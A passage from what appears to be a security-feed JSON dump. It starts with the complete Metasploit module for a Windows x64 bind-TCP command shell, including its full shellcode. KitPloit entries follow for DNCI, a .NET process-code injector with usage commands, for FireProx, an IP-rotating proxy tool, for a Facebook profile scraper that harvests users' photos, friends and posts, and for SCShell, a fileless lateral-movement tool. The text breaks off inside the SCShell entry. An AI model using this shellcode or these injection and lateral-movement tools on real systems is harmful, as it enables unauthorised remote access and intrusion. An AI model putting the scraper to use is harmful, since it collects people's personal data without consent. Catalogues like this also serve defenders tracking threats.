\"\\x20\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x4D\\x31\\xC9\\x48\\x31\\xC0\" +\n \"\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xED\" +\n \"\\x52\\x41\\x51\\x48\\x8B\\x52\\x20\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\" +\n \"\\x00\\x00\\x00\\x48\\x85\\xC0\\x74\\x67\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\" +\n \"\\x8B\\x40\\x20\\x49\\x01\\xD0\\xE3\\x56\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\" +\n \"\\x01\\xD6\\x4D\\x31\\xC9\\x48\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\" +\n \"\\x38\\xE0\\x75\\xF1\\x4C\\x03\\x4C\\x24\\x08\\x45\\x39\\xD1\\x75\\xD8\\x58\\x44\" +\n \"\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\" +\n \"\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x41\\x58\\x41\\x58\\x5E\\x59\\x5A\" +\n \"\\x41\\x58\\x41\\x59\\x41\\x5A\\x48\\x83\\xEC\\x20\\x41\\x52\\xFF\\xE0\\x58\\x41\" +\n \"\\x59\\x5A\\x48\\x8B\\x12\\xE9\\x57\\xFF\\xFF\\xFF\\x5D\\x49\\xBE\\x77\\x73\\x32\" +\n \"\\x5F\\x33\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xE6\\x48\\x81\\xEC\\xA0\\x01\\x00\" +\n \"\\x00\\x49\\x89\\xE5\\x49\\xBC\\x02\\x00\\x11\\x5C\\x00\\x00\\x00\\x00\\x41\\x54\" +\n \"\\x49\\x89\\xE4\\x4C\\x89\\xF1\\x41\\xBA\\x4C\\x77\\x26\\x07\\xFF\\xD5\\x4C\\x89\" +\n \"\\xEA\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xBA\\x29\\x80\\x6B\\x00\\xFF\\xD5\\x50\" +\n \"\\x50\\x4D\\x31\\xC9\\x4D\\x31\\xC0\\x48\\xFF\\xC0\\x48\\x89\\xC2\\x48\\xFF\\xC0\" +\n \"\\x48\\x89\\xC1\\x41\\xBA\\xEA\\x0F\\xDF\\xE0\\xFF\\xD5\\x48\\x89\\xC7\\x6A\\x10\" +\n \"\\x41\\x58\\x4C\\x89\\xE2\\x48\\x89\\xF9\\x41\\xBA\\xC2\\xDB\\x37\\x67\\xFF\\xD5\" +\n \"\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\xB7\\xE9\\x38\\xFF\\xFF\\xD5\\x4D\\x31\" +\n \"\\xC0\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\x74\\xEC\\x3B\\xE1\\xFF\\xD5\\x48\" +\n \"\\x89\\xF9\\x48\\x89\\xC7\\x41\\xBA\\x75\\x6E\\x4D\\x61\\xFF\\xD5\\x48\\x81\\xC4\" +\n \"\\xA0\\x02\\x00\\x00\\x49\\xB8\\x63\\x6D\\x64\\x00\\x00\\x00\\x00\\x00\\x41\\x50\" +\n \"\\x41\\x50\\x48\\x89\\xE2\\x57\\x57\\x57\\x4D\\x31\\xC0\\x6A\\x0D\\x59\\x41\\x50\" +\n \"\\xE2\\xFC\\x66\\xC7\\x44\\x24\\x54\\x01\\x01\\x48\\x8D\\x44\\x24\\x18\\xC6\\x00\" +\n \"\\x68\\x48\\x89\\xE6\\x56\\x50\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xFF\\xC0\\x41\" +\n \"\\x50\\x49\\xFF\\xC8\\x4D\\x89\\xC1\\x4C\\x89\\xC1\\x41\\xBA\\x79\\xCC\\x3F\\x86\" +\n \"\\xFF\\xD5\\x48\\x31\\xD2\\x48\\xFF\\xCA\\x8B\\x0E\\x41\\xBA\\x08\\x87\\x1D\\x60\" +\n \"\\xFF\\xD5\\xBB\\xE0\\x1D\\x2A\\x0A\\x41\\xBA\\xA6\\x95\\xBD\\x9D\\xFF\\xD5\\x48\" +\n \"\\x83\\xC4\\x28\\x3C\\x06\\x7C\\x0A\\x80\\xFB\\xE0\\x75\\x05\\xBB\\x47\\x13\\x72\" +\n \"\\x6F\\x6A\\x00\\x59\\x41\\x89\\xDA\\xFF\\xD5\"\n }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-06T08:38:56", "differentElements": ["modified", "published"], "edition": 30}], "viewCount": 25, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2019-11-06T10:51:43"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:47593", "EDB-ID:47594", "EDB-ID:47584", "EDB-ID:47582"]}, {"type": "mssecure", "idList": ["MSSECURE:8FCF4524349D245E482CA41E05D49374"]}, {"type": "kitploit", "idList": ["KITPLOIT:7323577050718865961"]}, {"type": "thn", "idList": ["THN:960DCF51C9F65091A09F7C0AD2BAFDB4"]}, {"type": "securelist", "idList": ["SECURELIST:A9B8DE2088B27BD39ECB584643D2E9C2"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A175FE0E2B98D95C6789EC72C4AC3EE9", "TALOSBLOG:148BAB0DA5CB7C56251F6708A1BB6CE1"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:3BE55E98005A88BB4C515B494707B549"]}, {"type": "talos", "idList": ["TALOS-2019-0876", "TALOS-2019-0891", "TALOS-2019-0916", "TALOS-2019-0892"]}, {"type": "nessus", "idList": ["UBUNTU_USN-4170-3.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155102", "PACKETSTORM:155111"]}, {"type": "ics", "idList": ["ICSA-19-134-01"]}, {"type": "ubuntu", "idList": ["USN-4170-3"]}], "modified": "2019-11-06T10:51:43"}, "vulnersScore": -0.3}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/x64/shell_bind_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 505\n\n include Msf::Payload::Windows\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x64 Command Shell, Bind TCP Inline',\n 'Description' => 'Listen for a connection and spawn a command shell (Windows x64)',\n 'Author' => [ 'sf' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'Payload' =>\n {\n 'Offsets' =>\n {\n 'LPORT' => [ 232, 'n' ],\n 'EXITFUNC' => [ 467, 'V' ],\n },\n 'Payload' =>\n \"\\xFC\\x48\\x83\\xE4\\xF0\\xE8\\xC0\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\" +\n \"\\x56\\x48\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\" +\n \"\\x20\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x4D\\x31\\xC9\\x48\\x31\\xC0\" +\n \"\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xED\" +\n \"\\x52\\x41\\x51\\x48\\x8B\\x52\\x20\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\" +\n \"\\x00\\x00\\x00\\x48\\x85\\xC0\\x74\\x67\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\" +\n \"\\x8B\\x40\\x20\\x49\\x01\\xD0\\xE3\\x56\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\" +\n \"\\x01\\xD6\\x4D\\x31\\xC9\\x48\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\" +\n \"\\x38\\xE0\\x75\\xF1\\x4C\\x03\\x4C\\x24\\x08\\x45\\x39\\xD1\\x75\\xD8\\x58\\x44\" +\n \"\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\" +\n \"\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x41\\x58\\x41\\x58\\x5E\\x59\\x5A\" +\n \"\\x41\\x58\\x41\\x59\\x41\\x5A\\x48\\x83\\xEC\\x20\\x41\\x52\\xFF\\xE0\\x58\\x41\" +\n \"\\x59\\x5A\\x48\\x8B\\x12\\xE9\\x57\\xFF\\xFF\\xFF\\x5D\\x49\\xBE\\x77\\x73\\x32\" +\n \"\\x5F\\x33\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xE6\\x48\\x81\\xEC\\xA0\\x01\\x00\" +\n \"\\x00\\x49\\x89\\xE5\\x49\\xBC\\x02\\x00\\x11\\x5C\\x00\\x00\\x00\\x00\\x41\\x54\" +\n \"\\x49\\x89\\xE4\\x4C\\x89\\xF1\\x41\\xBA\\x4C\\x77\\x26\\x07\\xFF\\xD5\\x4C\\x89\" +\n \"\\xEA\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xBA\\x29\\x80\\x6B\\x00\\xFF\\xD5\\x50\" +\n \"\\x50\\x4D\\x31\\xC9\\x4D\\x31\\xC0\\x48\\xFF\\xC0\\x48\\x89\\xC2\\x48\\xFF\\xC0\" +\n \"\\x48\\x89\\xC1\\x41\\xBA\\xEA\\x0F\\xDF\\xE0\\xFF\\xD5\\x48\\x89\\xC7\\x6A\\x10\" +\n \"\\x41\\x58\\x4C\\x89\\xE2\\x48\\x89\\xF9\\x41\\xBA\\xC2\\xDB\\x37\\x67\\xFF\\xD5\" +\n \"\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\xB7\\xE9\\x38\\xFF\\xFF\\xD5\\x4D\\x31\" +\n \"\\xC0\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\x74\\xEC\\x3B\\xE1\\xFF\\xD5\\x48\" +\n \"\\x89\\xF9\\x48\\x89\\xC7\\x41\\xBA\\x75\\x6E\\x4D\\x61\\xFF\\xD5\\x48\\x81\\xC4\" +\n \"\\xA0\\x02\\x00\\x00\\x49\\xB8\\x63\\x6D\\x64\\x00\\x00\\x00\\x00\\x00\\x41\\x50\" +\n \"\\x41\\x50\\x48\\x89\\xE2\\x57\\x57\\x57\\x4D\\x31\\xC0\\x6A\\x0D\\x59\\x41\\x50\" +\n \"\\xE2\\xFC\\x66\\xC7\\x44\\x24\\x54\\x01\\x01\\x48\\x8D\\x44\\x24\\x18\\xC6\\x00\" +\n \"\\x68\\x48\\x89\\xE6\\x56\\x50\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xFF\\xC0\\x41\" +\n \"\\x50\\x49\\xFF\\xC8\\x4D\\x89\\xC1\\x4C\\x89\\xC1\\x41\\xBA\\x79\\xCC\\x3F\\x86\" +\n \"\\xFF\\xD5\\x48\\x31\\xD2\\x48\\xFF\\xCA\\x8B\\x0E\\x41\\xBA\\x08\\x87\\x1D\\x60\" +\n \"\\xFF\\xD5\\xBB\\xE0\\x1D\\x2A\\x0A\\x41\\xBA\\xA6\\x95\\xBD\\x9D\\xFF\\xD5\\x48\" +\n \"\\x83\\xC4\\x28\\x3C\\x06\\x7C\\x0A\\x80\\xFB\\xE0\\x75\\x05\\xBB\\x47\\x13\\x72\" +\n \"\\x6F\\x6A\\x00\\x59\\x41\\x89\\xDA\\xFF\\xD5\"\n }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"]}

{"kitploit": [{"lastseen": "2019-11-23T01:30:13", "bulletinFamily": "tools", "description": "[ ![](https://1.bp.blogspot.com/-vqyEZ4wP_ho/XdYBep0yRQI/AAAAAAAAQ5I/WuqN-g2LHWATRmpmb5J7bQGkdua8PsFngCNcBGAsYHQ/s640/code-injection.png) ](<https://1.bp.blogspot.com/-vqyEZ4wP_ho/XdYBep0yRQI/AAAAAAAAQ5I/WuqN-g2LHWATRmpmb5J7bQGkdua8PsFngCNcBGAsYHQ/s1600/code-injection.png>)\n\n \nDNCI allows the injection of .Net code (.exe or .dll) remotely in unmanaged processes in windows. \n \n** 1\\. Project Structure ** \nThe project is structured in: \n\n\n * ** DNCI.Injector.Library ** \\- [ Injection ](<https://www.kitploit.com/search/label/Injection> \"Injection\" ) library. Contains all injection components and logic; \n * ** DNCI.Injector.Runner ** \\- Command line utility for injection; \n * ** DNCIClrLoader ** \\- C++ MicroCode to Load the .NET assembly into memory; \n * ** InjectDemo.Console.ClassicNet ** \\- Demo Classic .Net Console Application to be injected; \n * ** InjectDemo.Console.DotNetCore ** \\- Demo .Net Core Console Application to be injected; \n * ** InjectDemo.Dll.ClassicNet ** \\- Demo Classic .Net DLL to be injected; \n \n** 2\\. Documentation and Usage: ** \n \n** 2.1. [ Command Line ](<https://www.kitploit.com/search/label/Command%20Line> \"Command Line\" ) Utility Documentation ** \n\n\n * Parameters: \n * \\--help Show help information \n * \\--assemblyFile <SOURCE_FILE_PATH> Target .NET Classic DLL File \n * \\--className <TARGET_CLASS_NAME> The fully qualified type name of the managed assembly \n * \\--methodName <TARGET_CLASS_ENTRYPOINT_METHOD> The name of the managed method to execute. EX: EntryPoint (This method should be 'public static int') \n * \\--argument <ENTRYPOINT_METHOD_ARGUMENT> An optional argument to pass in to the managed function \n * \\--targetMode <TARGET_MODE> Injection Target Mode (BruteForce, PID, ProcessName) \n * \\--pid <TARGET_PROCESS_ID> Target Process ID \n * \\--processName <TARGET_PROCESS_Name> Target Process Name \n \n** Examples ** \n** Inject Classic .Net Console Application into Notepad++ ** \nThis example used the _ InjectDemo.Console.ClassicNet _ .exe file. DNCI.Injector.Runner.exe --assemblyFile \"<PATH_TO_FILE>\\InjectDemo.Console.ClassicNet.exe\" --className InjectDemo.Console.ClassicNet.Program --methodName EntryPoint --targetMode=processName --processName notepad++ --argument \"OK BOY\" \n** Inject Classic .Net Console Application into Process with ID 66 ** \nThis example used the _ InjectDemo.Console.ClassicNet _ .exe file. DNCI.Injector.Runner.exe --assemblyFile \"<PATH_TO_FILE>\\InjectDemo.Console.ClassicNet.exe\" --className InjectDemo.Console.ClassicNet.Program --methodName EntryPoint --targetMode=PID --pid 66 --argument \"OK BOY\" \n** Try to Inject Classic .Net Console Application into any Running Process ** \nThis example used the _ InjectDemo.Console.ClassicNet _ .exe file. DNCI.Injector.Runner.exe --assemblyFile \"<PATH_TO_FILE>\\InjectDemo.Console.ClassicNet.exe\" --className InjectDemo.Console.ClassicNet.Program --methodName EntryPoint --targetMode=BruteForce --argument \"OK BOY\" \n \n** 2.2. Injection Library Documentation ** \nThe injection library was designed to be used by any .Net program. In fact, the DNCI Command Line Utility do uses the DNCI Library it self. \n\n\n * Classes \n * ** Injector ** \\- Main injector componente; \n * ** InjectorConfiguration ** \\- Configuration model. Created to be an abstract model between the _ Injector _ and they consumers; \n * ** InjectorConfigurationBuilder ** \\- Fluent builder for the _ InjectionConfiguration _ model; \n * ** InjectorResult ** \\- Result model. Created to be an abstract model between the _ Injector _ and they consumers; \n * ** InjectorResultStatus ** \\- Enum with all possible injection status; \n \n** Building Parameters ** \n** Inject Classic .Net Console Application into [ Remote ](<https://www.kitploit.com/search/label/Remote> \"Remote\" ) Process ** \n\n \n \n Injector.Library.InjectorConfiguration config = Injector.Library.InjectorConfigurationBuilder\n .Instance()\n .InjectThisClrBinary(@\"<PATH_TO_BINARY>\\InjectDemo.Console.ClassicNet.exe\")\n .ClrClassName(\"InjectDemo.Console.ClassicNet.Program\")\n .ClrMethodName(\"EntryPoint\")\n .WithArguments(\"OK - It Works Baby\")\n .InjectOnProcess(\"cmd\") // Try to Inject on cmd process\n .InjectOnProcess(\"chrome\") // Try to Inject on chrome process\n .InjectOnProcess(\"cmd.exe\") // Try to Inject on cmd.exe process\n .InjectOnProcess(\"calc\") // Try to Inject on calc process\n .InjectOnProcess(\"notepad++\") // Try to Inject on notepad++ process\n .Build();\n\n** Brute Force to Inject Classic .Net DLL Application into Any Available Process ** \n\n \n \n Injector.Library.InjectorConfiguration config = Injector.Library.InjectorConfigurationBuilder\n .Instance()\n .InjectThisClrBinary(@\"<PATH_TO_BINARY>\\InjectDemo.Dll.ClassicNet.dll\")\n .ClrClassName(\"InjectDemo.Dll.ClassicNet.Class1\")\n .ClrMethodName(\"EntryPoint\")\n .WithArguments(\"OK - It Works Baby\")\n .InjectWithBruteForce()\n .Build();\n\n \n** Running the Injector ** \n\n \n \n // Create Injector Instance\n DNCI.Injector.Library.Injector injector = new Library.Injector(configBuilderconfig);\n \n // Execute the Injection\n List<InjectorResult> result = injector.Run();\n \n // Print Injection Result on Console\n foreach (InjectorResult res in result)\n {\n Console.WriteLine(res);\n }\n\n \n \n\n\n** [ Download DNCI ](<https://github.com/guibacellar/DNCI> \"Download DNCI\" ) **\n", "modified": "2019-11-22T21:00:02", "published": "2019-11-22T21:00:02", "id": "KITPLOIT:2456656505950828151", "href": "http://www.kitploit.com/2019/11/dnci-dot-net-code-injector.html", "title": "DNCI - Dot Net Code Injector", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-11-22T15:28:44", "bulletinFamily": "tools", "description": "[ ![](https://1.bp.blogspot.com/-HpSE89dIkuM/XdYAh2NtIQI/AAAAAAAAQ4c/iBzNlOOgcgE-kg4-wbwXrEaKPEQid28EgCNcBGAsYHQ/s640/fireprox_4_usage.png) ](<https://1.bp.blogspot.com/-HpSE89dIkuM/XdYAh2NtIQI/AAAAAAAAQ4c/iBzNlOOgcgE-kg4-wbwXrEaKPEQid28EgCNcBGAsYHQ/s1600/fireprox_4_usage.png>)\n\n \nBeing able to hide or continually rotate the source IP address when making web calls can be difficult or expensive. A number of tools have existed for some time but they were either limited with the number of IP addresses, were expensive, or required deployment of lots of VPS's. FireProx leverages the [ AWS API Gateway ](<https://www.kitploit.com/search/label/AWS%20API%20Gateway> \"AWS API Gateway\" ) to create pass-through proxies that rotate the source IP address with every request! Use FireProx to create a proxy URL that points to a destination server and then make web requests to the proxy URL which returns the destination server response! \n \n** Maintainer ** \n\n\n * Follow me on Twitter for more tips, tricks, and tools (or just to say hi)! ( [ Mike Felch - @ustayready ](<https://twitter.com/ustayready> \"Mike Felch - @ustayready\" ) ) \n \n** Benefits ** \n\n\n * Rotates IP address with every request \n * Configure separate regions \n * All HTTP methods supported \n * All parameters and URI's are passed through \n * Create, delete, list, or update proxies \n * Spoof X-Forwarded-For source IP header by requesting with an X-My-X-Forwarded-For header \n \n** Basic Usage ** \n \n** Requires AWS access key and secret access key or aws cli configured ** \nusage: ** fire.py ** [-h] [--access_key ACCESS_KEY] [--secret_access_key SECRET_ACCESS_KEY] [--region REGION] [--command COMMAND] [--api_id API_ID] [--url URL] \nFireProx API Gateway Manager \n\n \n \n optional arguments:\n -h, --help show this help message and exit\n --access_key ACCESS_KEY\n AWS Access Key\n --secret_access_key SECRET_ACCESS_KEY\n AWS Secret Access Key\n --region REGION AWS Region\n --command COMMAND Commands: list, create, delete, update\n --api_id API_ID API ID\n --url URL URL end-point\n\n * Examples \n * examples/google.py: Use a FireProx proxy to scrape Google search. \n * examples/bing.py: Use a FireProx proxy to scrape Bing search. \n \n** Installation ** \nYou can install and run with the following command: \n\n \n \n $ git clone https://github.com/ustayready/fireprox\n $ cd fireprox\n ~/fireprox$ virtualenv -p python3 .\n ~/fireprox$ source bin/activate\n (fireprox) ~/fireprox$ pip install -r requirements.txt\n (fireprox) ~/fireprox$ python fire.py\n\nNote that Python 3.6 is required. \nBuilding a Docker image: (Currently does not work on Docker for Windows, possibly due to line endings in entrypoint.sh.) \n\n \n \n $ git clone https://github.com/ustayready/fireprox\n $ cd fireprox\n $ docker build -t fireprox .\n $ docker run --rm -it fireprox -h\n\n \n** Screenshots ** \n \n\n\n[ ![](https://1.bp.blogspot.com/-9VJMjfQXuK4/XdYA1qMECAI/AAAAAAAAQ4k/A9mtHtTzJ18vjCLc1mDub8LzwW2xyraSwCNcBGAsYHQ/s640/fireprox_4_usage.png) ](<https://1.bp.blogspot.com/-9VJMjfQXuK4/XdYA1qMECAI/AAAAAAAAQ4k/A9mtHtTzJ18vjCLc1mDub8LzwW2xyraSwCNcBGAsYHQ/s1600/fireprox_4_usage.png>)\n\n \n\n\n[ ![](https://1.bp.blogspot.com/-ymf-ZFeCnxw/XdYA1eoANkI/AAAAAAAAQ4o/EzWl2VGdAl0MW9LH5_WG7vuHczMmegOXwCNcBGAsYHQ/s640/fireprox_5_list.png) ](<https://1.bp.blogspot.com/-ymf-ZFeCnxw/XdYA1eoANkI/AAAAAAAAQ4o/EzWl2VGdAl0MW9LH5_WG7vuHczMmegOXwCNcBGAsYHQ/s1600/fireprox_5_list.png>)\n\n \n\n\n[ ![](https://1.bp.blogspot.com/-I2n_KW6dE-Q/XdYA1ns20tI/AAAAAAAAQ4s/gWZ5jDjOUUUtQx8k36Bv4iGTmR97Gz0vQCNcBGAsYHQ/s640/fireprox_6_create.png) ](<https://1.bp.blogspot.com/-I2n_KW6dE-Q/XdYA1ns20tI/AAAAAAAAQ4s/gWZ5jDjOUUUtQx8k36Bv4iGTmR97Gz0vQCNcBGAsYHQ/s1600/fireprox_6_create.png>)\n\n \n\n\n[ ![](https://1.bp.blogspot.com/-p979YWRggNo/XdYA2c2ly3I/AAAAAAAAQ4w/qOzPYj8aU2oRBSWIbkCKw4swz3PebkveQCNcBGAsYHQ/s640/fireprox_7_delete.png) ](<https://1.bp.blogspot.com/-p979YWRggNo/XdYA2c2ly3I/AAAAAAAAQ4w/qOzPYj8aU2oRBSWIbkCKw4swz3PebkveQCNcBGAsYHQ/s1600/fireprox_7_delete.png>)\n\n \n\n\n[ ![](https://1.bp.blogspot.com/-Wi27Os52wI8/XdYA2qpeOKI/AAAAAAAAQ40/QRPY5mdS-pcNn7wsR-9si8F4jfGAxel9gCNcBGAsYHQ/s1600/fireprox_8_demo.png) ](<https://1.bp.blogspot.com/-Wi27Os52wI8/XdYA2qpeOKI/AAAAAAAAQ40/QRPY5mdS-pcNn7wsR-9si8F4jfGAxel9gCNcBGAsYHQ/s1600/fireprox_8_demo.png>)\n\n \n \n\n\n** [ Download Fireprox ](<https://github.com/ustayready/fireprox> \"Download Fireprox\" ) **\n", "modified": "2019-11-22T12:11:05", "published": "2019-11-22T12:11:05", "id": "KITPLOIT:7795803270770210904", "href": "http://www.kitploit.com/2019/11/fireprox-aws-api-gateway-management.html", "title": "FireProx - AWS API Gateway Management Tool For Creating On The Fly HTTP Pass-Through Proxies For Unique IP Rotation", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-11-22T01:24:09", "bulletinFamily": "tools", "description": "[ ![](https://1.bp.blogspot.com/-XP4GRwvdIHw/XdNYvIlKquI/AAAAAAAAQ4E/6fmCNDqBmjcKJhF6kP0tpoYRkrRzaBvDQCNcBGAsYHQ/s640/Ultimate-Facebook-Scraper_19_screenshot.png) ](<https://1.bp.blogspot.com/-XP4GRwvdIHw/XdNYvIlKquI/AAAAAAAAQ4E/6fmCNDqBmjcKJhF6kP0tpoYRkrRzaBvDQCNcBGAsYHQ/s1600/Ultimate-Facebook-Scraper_19_screenshot.png>)\n\n \nTooling that ** automates ** your social media interactions to collect posts, photos, videos, friends, followers and much more on Facebook. \n\n\n \n\n\n** Features ** \nA bot which scrapes almost everything about a facebook user's profile including \n\n\n * uploaded photos \n * tagged photos \n * videos \n * friends list and their profile photos (including Followers, Following, Work Friends, College Friends etc) \n * and all public posts/statuses available on the user's timeline. \n\n \n\n\nThe best thing about this scraper is that the data is scraped in an organized format so that it can be used for educational/research purpose by researchers. Moreover, this scraper does not use Facebook's Graph API so there are no rate limiting issues as such. \n** This tool is being used by thousands of developers weekly and we are pretty amazed at this response! Thankyou guys! \uf389 ** \nFor details regarding ** citing/referencing ** this tool for your research, check the 'Citation' section below. \n \n** Note ** \nAt its core, this tool uses xpaths of ** 'divs' ** to extract data from them. Since Facebook keeps on updating its site frequently and the 'divs' get changed. Consequently, we have to update the divs accordingly to correctly scrape the data. \nThe developers of this tool have devoted a lot of time and effort in developing and most importantly maintaining this tool for quite a lot time now. ** In order to keep this amazing tool alive, we need support from you geeks. ** \nThe code is pretty intuitive and easy to understand, so you can update the relevant xpaths in the code when you feel that you have tried many profiles and the data isn't being scraped for any of them (that's a hint that Facebook has updated their site) and generate a pull request. That's quite an easy thing to do. Thanks! \n \n** Sample ** \n\n\n \n\n\n[ ![](https://1.bp.blogspot.com/-BZ-c7ezD4wE/XdNY3GfaEbI/AAAAAAAAQ4I/I2PvaxLFCIofbeuD86CywOoKjZ7Nbtt6QCNcBGAsYHQ/s640/Ultimate-Facebook-Scraper_18_main.png) ](<https://1.bp.blogspot.com/-BZ-c7ezD4wE/XdNY3GfaEbI/AAAAAAAAQ4I/I2PvaxLFCIofbeuD86CywOoKjZ7Nbtt6QCNcBGAsYHQ/s1600/Ultimate-Facebook-Scraper_18_main.png>)\n\n** Screenshot ** \n\n\n \n\n\n[ ![](https://1.bp.blogspot.com/-t5jFK84FK8U/XdNY8QTTbyI/AAAAAAAAQ4M/TdZEavyJhbs9f6hMXqSDAJz8bmoEujVHwCNcBGAsYHQ/s640/Ultimate-Facebook-Scraper_19_screenshot.png) ](<https://1.bp.blogspot.com/-t5jFK84FK8U/XdNY8QTTbyI/AAAAAAAAQ4M/TdZEavyJhbs9f6hMXqSDAJz8bmoEujVHwCNcBGAsYHQ/s1600/Ultimate-Facebook-Scraper_19_screenshot.png>)\n\n** Usage ** \n \n** Installation ** \nYou will need to install latest version of [ Google Chrome ](<https://www.google.com/chrome/> \"Google Chrome\" ) . Moreover, you need to install [ selenium ](<https://www.kitploit.com/search/label/Selenium> \"selenium\" ) module as well using \n\n \n \n pip install selenium\n\nRun the code using Python 3. Also, the code is multi-platform and is tested on both Windows and Linux. The tool uses latest version of [ Chrome Web Driver ](<http://chromedriver.chromium.org/downloads> \"Chrome Web Driver\" ) . I have placed the webdriver along with the code but if that version doesn't work then replace the chrome web driver with the latest one. \n \n** How to Run ** \nThere's a file named \"input.txt\". You can add as many profiles as you want in the following format with each link on a new line: \n\n \n \n https://www.facebook.com/andrew.ng.96\n https://www.facebook.com/zuck\n\nMake sure the link only contains the username or id number at the end and not any other stuff. Make sure its in the format mentioned above. \nNote: There are two modes to download Friends Profile Pics and the user's Photos: Large Size and Small Size. You can change the following variables. By default they are set to Small Sized Pics because its really quick while Large Size Mode takes time depending on the number of pictures to download \n\n \n \n # whether to download the full image or its thumbnail (small size)\n # if small size is True then it will be very quick else if its False then it will open each photo to download it\n # and it will take much more time\n friends_small_size = True\n photos_small_size = True\n\n \n** Authors ** \nYou can get in touch with us on our LinkedIn Profiles: \n** Haris Muneer ** \n** Hassaan Elahi ** \n \n \n\n\n** [ Download Ultimate-Facebook-Scraper ](<https://github.com/harismuneer/Ultimate-Facebook-Scraper> \"Download Ultimate-Facebook-Scraper\" ) **\n", "modified": "2019-11-21T20:51:00", "published": "2019-11-21T20:51:00", "id": "KITPLOIT:2423308827989438502", "href": "http://www.kitploit.com/2019/11/ultimate-facebook-scraper-bot-which.html", "title": "Ultimate Facebook Scraper - A Bot Which Scrapes Almost Everything About A Facebook User'S Profile Including All Public Posts/Statuses Available On The User'S Timeline, Uploaded Photos, Tagged Photos, Videos, Friends List And Their Profile Photos", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-11-21T17:25:11", "bulletinFamily": "tools", "description": "[ ![](https://1.bp.blogspot.com/-15_k8d9kxEg/XdNX0HNOgQI/AAAAAAAAQ38/oh4AXndnQH0fQjsmvWOsRinh5kAldmf6QCNcBGAsYHQ/s640/SCShell_1_network.png) ](<https://1.bp.blogspot.com/-15_k8d9kxEg/XdNX0HNOgQI/AAAAAAAAQ38/oh4AXndnQH0fQjsmvWOsRinh5kAldmf6QCNcBGAsYHQ/s1600/SCShell_1_network.png>)\n\n \nFileless lateral movement tool that relies on ChangeServiceConfigA to run command. The beauty of this tool is that it doesn't perform authentication against SMB everything is performed over DCERPC. \nThe utility can be used remotely WITHOUT registering a service or creating a service. It also doesn't have to drop any file on the [ remote ](<https://www.kitploit.com/search/label/Remote> \"remote\" ) system* (Depend on the technique used to execute) \n \n** How it work ** \nInstead of creating a service it simply remotely open a service and modify the [ binary ](<https://www.kitploit.com/search/label/Binary> \"binary\" ) path name via the ` ChangeServiceConfigA ` API. \nThen it starts the service. \nOnce the execution is completed the service binary path is reverted to the original one. The original service path is extracted using ` QueryServiceConfigA ` . \nEverything is happening over DCERPC including the authentication. \n \n \n\n\n[ ![](https://1.bp.blogspot.com/-15_k8d9kxEg/XdNX0HNOgQI/AAAAAAAAQ38/oh4AXndnQH0fQjsmvWOsRinh5kAldmf6QCNcBGAsYHQ/s640/SCShell_1_network.png) 